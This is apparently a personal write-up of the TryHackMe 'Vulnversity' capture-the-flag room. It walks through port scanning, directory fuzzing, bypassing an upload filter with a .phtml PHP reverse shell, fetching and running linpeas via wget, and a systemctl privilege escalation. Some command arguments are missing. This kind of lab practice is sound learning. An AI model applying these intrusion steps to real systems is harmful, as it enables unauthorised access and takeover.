So according to a post I saw on Medium, this is one of a series of OSCP like rooms on THM. I’ll give it a go.

Open Ports

I’ve got ports 21 (FTP), 22 (SSH), 139 + 445 (SMB), so maybe this is a Windows box. I also have 3128 which may be for the Squid Caching Web Proxy (Wikipedia) and 3333 which is a non-standard port. I’ll have to ask nmap for more details.

Scan Detail

nmap says we’ve got vsftpd 3.0.3 on port 21, OpenSSH 7.2p2 on port 22, SMB on 139+445, plus:

3128/tcp open  http-proxy  syn-ack ttl 63 Squid http proxy 3.5.12, and
3333/tcp open  http        syn-ack ttl 63 Apache httpd 2.4.18 (Ubuntu)

So actually this is a Linux box with a webserver on port 3333.

The scan also says the version of Squid has a 10 out of 10 CVE, so I’m going to want to check that out.


Visiting the webserver reveals a front page for a University, many of the links don’t work though. There is no robots.txt, but /images and /js both offer directory listings. Let’s fuzz:

root@kali:/opt/tryhackme/vulniversity# wfuzz --hc 404 -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

The fuzzing turned up a page called /internal, which appears to offer some sort of file upload. The index page for this subdirectory is index.php, so the server is running PHP. Fuzzing inside the directory finds, where our files will appear. Let’s try a PHP reverse shell.


Using the .phtml extension I could upload the pentestmonkey PHP reverse shell and connect as www-data. I copied over to /dev/shm and ran it.

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@vulnuniversity:/dev/shm$ wget
--2020-06-19 05:41:52--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 161179 (157K) [text/x-sh]
Saving to: ''          100%[===================>] 157.40K   176KB/s    in 0.9s    

2020-06-19 05:41:54 (176 KB/s) - '' saved [161179/161179]

www-data@vulnuniversity:/dev/shm$ chmod +x
chmod +x
www-data@vulnuniversity:/dev/shm$ ./

Linpeas showed a probable privesc via SystemCTL, which can be found on GTFOBins, and sure enough this led to root.